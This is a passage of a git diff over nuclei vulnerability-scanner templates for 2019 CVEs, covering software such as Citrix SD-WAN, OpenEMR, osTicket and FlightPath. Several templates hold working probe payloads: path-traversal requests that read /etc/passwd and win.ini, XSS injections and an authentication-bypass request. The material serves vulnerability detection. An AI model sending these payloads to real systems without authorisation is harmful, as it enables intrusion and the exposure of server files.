attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. - reference: - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N - cvss-score: 6.5 - cve-id: CVE-2019-12616 - cwe-id: CWE-352 - tags: cve,cve2019,phpmyadmin,csrf -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - 401 # password protected - - type: word - words: - - "phpmyadmin.net" - - "phpMyAdmin" - condition: or - - type: dsl - dsl: - - compare_versions(version, '< 4.9.0') - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '\?v=([0-9.]+)' - - type: regex - group: 1 - regex: - - '\?v=([0-9.]+)' diff --git a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml b/nuclei-templates/CVE-2019/CVE-2019-12962.yaml deleted file mode 100644 index 13749b9d0e..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2019-12962 - -info: - name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting - author: Clment Cruchet - severity: medium - description: | - LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. - reference: - - https://www.exploit-db.com/exploits/49669 - - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12962 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:LiveZilla - verified: true - tags: xss,edb,packetstorm,cve,cve2019,livezilla - - -requests: - - method: GET - path: - - '{{BaseURL}}/mobile/index.php' - - headers: - Accept-Language: ';alert(document.domain)//' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var detectedLanguage = ';alert(document.domain)//';" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/08 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12985.yaml b/nuclei-templates/CVE-2019/CVE-2019-12985.yaml index b96a4144a4..4a1d4341b4 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12985.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12985.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire Citrix SD-WAN Center infrastructure. + remediation: | + Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12985 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97276 + epss-percentile: 0.99843 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: cve,cve2019,citrix,rce,unauth,tenable + shodan-query: http.title:"Citrix SD-WAN" + tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 490a00463044022007073a870a4add30131c5c00b135d70d1a866ff94c73254c7be36d7f69035400022019d693623a03aab5928cdd7c484b47e720fd292ec84beaa923722af625bd5648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12986.yaml b/nuclei-templates/CVE-2019/CVE-2019-12986.yaml index 1363a9bf7b..2599109455 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12986.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12986.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the trace_route function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. + remediation: | + Apply the necessary patches or updates provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12986 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: unauth,tenable,cve,cve2019,citrix,rce + shodan-query: http.title:"Citrix SD-WAN" + tags: cve2019,cve,unauth,oast,tenable,citrix,rce http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 490a0046304402202b0ef3bbb83d1e3a581627f23a46bc39a52ce5065a1b54900ecf212a4377804c0220543b800342938579c7f4f18a4bedd5ea77398f66a0171d9a40d3a1c25678e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12987.yaml b/nuclei-templates/CVE-2019/CVE-2019-12987.yaml index 7c84d0aaec..b25abcb298 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12987.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12987.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the apply action in StorageMgmtController. The callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for action, host, path, or type, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. + remediation: | + Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12987 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: citrix,rce,unauth,tenable,cve,cve2019 + shodan-query: http.title:"Citrix SD-WAN" + tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 490a0046304402205aba00dc71a461ecf5a2b4d96f029ca13228c3b3bd06050a3c62de6a25f718b50220708eabd18c088a9d7051f3c65bda1a976658e97572d79df298e9a97b73fc899f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12988.yaml b/nuclei-templates/CVE-2019/CVE-2019-12988.yaml index 96229d44a3..49902a9eb7 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12988.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12988.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the addModifyZTDProxy function in NmsController. The function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ztd_password, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. + remediation: | + Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12988 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97276 + epss-percentile: 0.99843 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: rce,unauth,tenable,cve,cve2019,citrix + shodan-query: http.title:"Citrix SD-WAN" + tags: cve,cve2019,rce,unauth,oast,tenable,citrix http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 4a0a00473045022010a0d4f590ec7df72f845b76afa10bba295cb790b5809a2e8f9ee10f2ce4e675022100ea18957ac1dfad6868cf21d0c21ef9ea8f03951dfc7dc71c1755160935f07d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12990.yaml b/nuclei-templates/CVE-2019/CVE-2019-12990.yaml index e8757eb3fa..e582f7f42c 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12990.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12990.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to local file inclusion via the applianceSettingsFileTransfer function in ApplianceSettingsController. The function does not sufficiently validate or sanitize HTTP request parameter values used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for filename, filedata, and workspace_id, therefore being able to write files to locations writable by the www-data user and/or to write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or denial of service. remediation: | Apply the latest security patches or updates provided by Citrix to mitigate the vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12990 cwe-id: CWE-22 - epss-score: 0.94814 - epss-percentile: 0.99071 + epss-score: 0.92152 + epss-percentile: 0.98756 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 @@ -51,5 +53,4 @@ http: - status_code_3 == 200 - contains(body_1, "Citrix SD-WAN") condition: and - -# digest: 4a0a00473045022064e7769e949952387d8d15bc023cbdc50a52b1631164c1e00054b400f2c58d850221008e09ade789e613b29d7df893f7a4eb89b19683128c839e94ca6e33a05e4eacb7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022028d757c9021cfe91970444757763cf2003785713ea9f3602bd768bd83be0f8c3022100c9296bbe6b5d59548f4e8fba22c9ef4b44984f446ca9b44fec7de62e4bc23bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-13101.yaml b/nuclei-templates/CVE-2019/CVE-2019-13101.yaml index 978be5cfa8..747ee42f66 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-13101.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-13101.yaml @@ -1,35 +1,35 @@ -id: CVE-2019-13101 - -info: - author: Suman_Kar - name: D-Link DIR-600M - Authentication Bypass - description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. - severity: critical - tags: cve,cve2019,dlink,router,iot - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - - https://github.com/d0x0/D-Link-DIR-600M - - https://www.exploit-db.com/exploits/47250 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-13101 - cwe-id: CWE-306 - -requests: - - raw: - - | - GET /wan.htm HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "/PPPoE/" +id: CVE-2019-13101 + +info: + author: Suman_Kar + name: D-Link DIR-600M - Authentication Bypass + description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. + severity: critical + tags: cve,cve2019,dlink,router,iot + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 + - https://github.com/d0x0/D-Link-DIR-600M + - https://www.exploit-db.com/exploits/47250 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-13101 + cwe-id: CWE-306 + +requests: + - raw: + - | + GET /wan.htm HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "/PPPoE/" part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-13396.yaml b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml new file mode 100644 index 0000000000..d1cafa9db7 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml @@ -0,0 +1,63 @@ +id: CVE-2019-13396 + +info: + name: FlightPath - Local File Inclusion + author: 0x_Akoko,daffainfo + severity: medium + description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/47121 + - http://getflightpath.com/node/2650 + - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2019-13396 + cwe-id: CWE-22 + epss-score: 0.02602 + epss-percentile: 0.90051 + cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: getflightpath + product: flightpath + tags: cve,cve2019,flightpath,lfi,edb,getflightpath + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + group: 1 + regex: + - "idden' name='form_token' value='([a-z0-9]+)'>" + internal: true + part: body +# digest: 4a0a00473045022100f914e78ac71588395cde4bdd71fd9b68becbacd99efa10a46cd8fb336167e4990220063fa341232cdda62f8cf22c6e18aa7a5abd50cc86691eb6dec1c43bedf7749a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-14205.yaml b/nuclei-templates/CVE-2019/CVE-2019-14205.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14205.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14205.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-14223.yaml b/nuclei-templates/CVE-2019/CVE-2019-14223.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14223.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14223.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-14251.yaml b/nuclei-templates/CVE-2019/CVE-2019-14251.yaml new file mode 100644 index 0000000000..9b1fec3938 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-14251.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-14251 +info: + name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal + author: 0x_Akoko + severity: high + description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. + reference: + - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt + - https://www.cvedetails.com/cve/CVE-2019-14251 + - https://vuldb.com/?id.146815 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-14251 + cwe-id: CWE-22 + tags: cve,cve2019,temenos,lfi,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-14322.yaml b/nuclei-templates/CVE-2019/CVE-2019-14322.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14322.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14322.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-14530.yaml b/nuclei-templates/CVE-2019/CVE-2019-14530.yaml index 9036514de2..0c41cb85cf 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-14530.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-14530.yaml @@ -6,21 +6,32 @@ info: severity: high description: | OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. + remediation: | + Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/50037 - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip - https://github.com/openemr/openemr/pull/2592 - https://nvd.nist.gov/vuln/detail/CVE-2019-14530 + - https://github.com/sec-it/exploit-CVE-2019-14530 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-14530 cwe-id: CWE-22 + epss-score: 0.81752 + epss-percentile: 0.98283 + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: lfi,authenticated,edb,cve,cve2019,openemr + verified: true + max-request: 2 + vendor: open-emr + product: openemr + tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr -requests: +http: - raw: - | POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 @@ -28,27 +39,25 @@ requests: Content-Type: application/x-www-form-urlencoded new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1 - - | GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: word part: header words: - filename=passwd + - type: regex + regex: + - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a004730450220581dc7f9af0e6819134169343d3902a8c4ca36a9c1794b2bdc3da5fabbe6729002210093bc4a3b29b79ac4bcf1e1922164adf7f0e82eca386e7de5af62c4a228587ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14750.yaml b/nuclei-templates/CVE-2019/CVE-2019-14750.yaml index 7a62889c9e..38dda391f5 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-14750.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-14750.yaml @@ -1,71 +1,88 @@ -id: CVE-2019-14750 - -info: - name: osTicket < 1.12.1 - Cross-Site Scripting - author: TenBird - severity: medium - description: | - An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. - reference: - - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-14750 - classification: - cve-id: CVE-2019-14750 - metadata: - max-request: 4 - shodan-query: title:"osTicket" - tags: cve,cve2019,osticket,xss,intrusive - -requests: - - raw: - - | - POST /upload/setup/install.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - s=install&name=test&email=test%40test.com&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email=test222%40test.com&username=test&passwd=asdf1234&passwd2=asdf1234&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo - - - | - GET /upload/scp/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - | - POST /upload/scp/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - __CSRFToken__={{csrftoken}}&do=scplogin&userid=test&passwd=asdf1234&ajax=1 - - - | - GET /upload/scp/settings.php HTTP/1.1 - Host: {{Hostname}} - - redirects: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body_4 - words: - - '' - - 'getConfig().resolve' - condition: and - - - type: word - part: header_4 - words: - - text/html - - - type: status - status: - - 200 - - extractors: - - type: regex - name: csrftoken - part: body - group: 1 - regex: - - '__CSRFToken__" value="(.*?)"' - internal: true +id: CVE-2019-14750 + +info: + name: osTicket < 1.12.1 - Cross-Site Scripting + author: TenBird + severity: medium + description: | + An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to version 1.12.1 or later to mitigate this vulnerability. + reference: + - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-14750 + - http://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html + - https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12 + - https://github.com/osTicket/osTicket/releases/tag/v1.10.7 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14750 + cwe-id: CWE-79 + epss-score: 0.05107 + epss-percentile: 0.92161 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + tags: cve,cve2019,packetstorm,osticket,xss,intrusive +variables: + user_name: "{{to_lower(rand_text_alphanumeric(6))}}" + user_pass: "{{rand_text_alphanumeric(12)}}" + user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" + +http: + - raw: + - | + POST /upload/setup/install.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + s=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo + - | + GET /upload/scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + POST /upload/scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1 + - | + GET /upload/scp/settings.php HTTP/1.1 + Host: {{Hostname}} + + redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_4 + words: + - '' + - 'getConfig().resolve' + condition: and + + - type: word + part: header_4 + words: + - text/html + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true +# digest: 4a0a004730450221009eeb1aecb7f7ee802cfd019bdbb9f81f98886ef6692f3c8883999696d0f6b8e302201d37fff5e31a6f4d57613523ed67d21d2c9c7c50cbb556cfe44e0907928f1003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14789.yaml b/nuclei-templates/CVE-2019/CVE-2019-14789.yaml index aae23290ec..66a4abe1ab 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-14789.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-14789.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability. reference: @@ -19,7 +21,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46773 + epss-percentile: 0.46015 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss + tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar http: - raw: @@ -48,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Custom 404 Pro")' condition: and -# digest: 4b0a00483046022100f0b6554e6dd347b97a9cd76dccaa2cd3b7612474b89aa3bf1caf831ec333f152022100cd3d47f09ae415bba2e750139bf6dee7b5183c57a2306d22fc9376a169e49b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f868cbc5ff74801e824e4721f229eb4edaebfaefdde075bae4c07c4d2123145202202a8a32c4eb6a0c0c1683beb54270a0af67a0d0aa825c5c2043739a93cb305c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14974.yaml b/nuclei-templates/CVE-2019/CVE-2019-14974.yaml deleted file mode 100644 index 3549909156..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-14974.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2019-14974 - -info: - name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting - author: madrobot - severity: low - -requests: - - method: GET - path: - - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "url = window.location.search.split(\"?desktop_url=\")[1]" - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-15107.yaml b/nuclei-templates/CVE-2019/CVE-2019-15107.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15107.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15107.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15501.yaml b/nuclei-templates/CVE-2019/CVE-2019-15501.yaml index aa65b25dac..e2ea1d72f4 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15501.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15501.yaml @@ -1,4 +1,5 @@ id: CVE-2019-15501 + info: name: LSoft ListServ - XSS author: LogicalHunter @@ -14,20 +15,24 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 description: "Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter." + requests: - method: GET path: - '{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - '' part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-15642.yaml 